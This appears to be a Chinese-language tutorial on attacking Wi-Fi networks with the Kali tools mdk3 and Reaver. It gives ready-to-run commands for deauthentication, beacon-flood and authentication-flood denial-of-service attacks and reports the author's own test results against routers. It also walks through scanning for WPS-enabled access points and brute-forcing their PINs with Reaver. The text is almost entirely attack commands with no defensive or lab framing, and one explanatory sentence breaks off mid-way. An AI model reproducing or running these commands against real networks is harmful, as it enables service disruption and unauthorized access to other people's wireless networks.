目录
mdk3的使用
mdk3是Kali自带的工具,可以发动Beacon Flood、Authentication DoS、Deauthentication/Disassociation Amok 等模式的攻击,还能暴力猜解essid、802.1X 渗透测试、WIDS干扰。
Deauthentication/Disassociation Amok 强制解除认证攻击
原理是广播Deauth帧,使得
参数:
d表示调用D类测试模块,即Deauth。使用./wifi.txt的mac名单,-b黑名单,即指定攻击目标,-w白名单,即指定不攻击目标,-c设置信道,-s发射速率。该方法只能攻击特定信道的无线网络
mdk3 wlan0 d -w ./wifi.txt -c 5 -s 1000
mdk3 wlan0 d -b ./wifi.txt (攻击除白名单的所有AP)
使用wireshark抓包,发现了大量的deauth包。都是无线网卡冒充路由器发送的。
Beacon Flood 信号溢出攻击
制造大量无用的wifi信号干扰原信号。
参数:
b表示调用B类测试模块,即Beacon Flood。使用./wifi.txt的mac名单,-f制造名字一样的wifi名字,-a加密方式wpa2,-s发射帧速率,-c 信道
mdk3 wlan0 b -f /root/mdk3/wifi_essid.txt -a -s 1500 -c 3
或者不加参数,默认广播一堆乱码
mdk3 wlan0 b -a
Authentication Flood认证洪水攻击
大量发送认证帧,严重的可以导致路由器瘫痪重启。自己测试过了,市面上的路由器,只要不是零几年生产的老掉牙的型号,都不会重启,已经连接的客户端网络会变卡,没有建立连接的客户端就连接不上了。
参数:
a认证洪水攻击
-a #测试指定BSSID
-m #使用有效数据库中的客户端mac地址
-c #对应 -a ,不检查是否测试成功
-i #对指定BSSID进行智能攻击
-s #速率,默认无限制
mdk3 wlan0 a –a AP的MAC地址(BSSID)
对于x-802.1X测试,1-EAPOL注销测试企业级的路由器才用得上。
Reaver使用
reaver用在无线渗透上能用到的功能也就是pin码破解。
WPS(Wi-Fi Protected Setup,WiFi保护设置),是由WiFi联盟组织实施的认证项目,其主要目的是用来简化无线网络的安全加密配置。而PIN码是WPS的一种验证方式,相当于无线WiFi的密码。
先侦听信道
方法1:wash -i wlan0mon -c 11#启动侦听,发现支持WPS的AP,-c指定信道11
方法2:airodump-ng wlan0mon --wps #抓包
找到支持WPS功能的路由器
reaver -i wlan0mon -b 14:75:20:21:75:55 -vv -c 11#爆破PIN码,-b指定AP的MAC,-vv说明详细显示信息
reaver -i wlan0mon -b 14:75:20:21:75:55 -vv -c 11 -K 1 #针对有漏洞的,秒破,可以先尝试
reaver -i wlan0mon -b 14:75:20:21:75:55 -vv -c 11 -p 88888888 #-p指定PIN码